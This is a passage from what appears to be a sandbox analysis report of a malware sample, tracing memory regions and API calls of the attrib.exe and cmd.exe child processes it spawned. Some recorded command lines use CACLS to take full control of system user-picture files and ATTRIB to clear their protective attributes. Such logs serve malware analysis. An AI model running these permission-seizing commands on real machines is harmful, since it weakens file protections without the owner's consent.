entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26319 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26320 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26321 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26322 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26323 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 26324 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26325 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26326 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26327 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26328 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26329 start_va = 0x773c0000 end_va = 0x773d8fff 
entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26330 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 527 os_tid = 0xe28 Thread: id = 528 os_tid = 0xcf4 Process: id = "369" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "367" os_parent_pid = "0xd48" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26331 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26332 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26333 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26334 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26335 start_va = 0x870000 end_va = 0x876fff entry_point = 0x870000 region_type = mapped_file name = "attrib.exe" filename = 
"\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26336 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26337 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26338 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26339 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26340 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26341 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26342 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26343 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26344 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26345 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 26346 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = 
"\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26347 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26348 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26349 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26350 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26351 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26352 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26353 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26354 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26355 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26356 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26357 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26358 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 26359 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26360 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 529 os_tid = 0xd8c Process: id = "370" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" 
[0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26361 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26362 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26363 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26364 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26365 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26366 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26367 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26368 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26369 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26370 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26371 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26372 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26373 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 26374 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26375 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 26376 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26377 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26378 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26379 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26380 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26381 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = 
mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26382 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26383 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26384 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26385 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 26386 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26387 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26388 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26389 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26390 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26391 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 26392 start_va = 0x470000 end_va = 0x570fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 26393 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 26394 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 26395 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 530 os_tid = 0x8ec [0185.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa64 | out: lpSystemTimeAsFileTime=0x30fa64*(dwLowDateTime=0xa3630020, dwHighDateTime=0x1d440a9)) [0185.356] GetCurrentProcessId () returned 0xd44 [0185.356] GetCurrentThreadId () returned 0x8ec [0185.356] GetTickCount () returned 0x35002 [0185.356] QueryPerformanceCounter (in: lpPerformanceCount=0x30fa5c | out: lpPerformanceCount=0x30fa5c*=24214512960) returned 1 [0185.356] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.357] __set_app_type (_Type=0x1) [0185.357] __p__fmode () returned 0x76b331f4 [0185.357] __p__commode () returned 0x76b331fc [0185.357] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.357] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.357] GetCurrentThreadId () returned 0x8ec [0185.357] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8ec) returned 0x38 [0185.357] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.357] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0185.357] SetThreadUILanguage (LangId=0x0) 
returned 0x409 [0185.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.357] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f9f4 | out: phkResult=0x30f9f4*=0x0) returned 0x2 [0185.357] VirtualQuery (in: lpAddress=0x30fa2b, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.358] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0185.358] GetConsoleOutputCP () returned 0x1b5 [0185.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.358] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.358] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0185.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.358] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.359] GetEnvironmentStringsW () returned 0xb0308* [0185.359] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.359] GetEnvironmentStringsW () returned 0xb0308* [0185.359] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e964 | out: phkResult=0x30e964*=0x40) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0xb8, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x0, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, 
lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegCloseKey (hKey=0x40) returned 0x0 [0185.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e964 | out: phkResult=0x30e964*=0x40) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x40, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x4) returned 0x0 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x1, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x0, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e96c, 
lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x4, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x4) returned 0x0 [0185.360] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e96c, lpData=0x30e970, lpcbData=0x30e968*=0x1000 | out: lpType=0x30e96c*=0x0, lpData=0x30e970*=0x9, lpcbData=0x30e968*=0x1000) returned 0x2 [0185.360] RegCloseKey (hKey=0x40) returned 0x0 [0185.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0185.360] srand (_Seed=0x5b886393) [0185.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" [0185.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" [0185.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.360] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.360] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.360] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.361] GetEnvironmentStringsW () returned 0xb2458* [0185.361] FreeEnvironmentStringsW (penv=0xb2458) returned 1 [0185.361] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.361] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.361] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.361] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.361] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.361] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.361] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.361] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f730 | out: 
